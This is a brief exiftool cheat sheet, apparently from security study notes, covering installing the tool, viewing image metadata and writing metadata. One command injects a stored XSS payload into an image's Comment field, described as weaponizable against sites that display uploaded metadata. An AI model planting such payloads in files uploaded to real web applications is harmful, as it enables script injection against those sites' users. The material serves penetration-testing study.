EXIFTOOL

root@dco:~$ sudo apt search exiftool
root@dco:~$ sudo apt install forensics-extra

#viewing image metadata
root@dco:~$ exiftool imageFilename.jpg

#adding metadata to an image parameter
root@dco:~$ exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
 * this method can be weaponized for OCO and will only activate on web applications that display an image's metadata after it's been uploaded
PreviousDFIRNextNETWORK FORENSICS

Last updated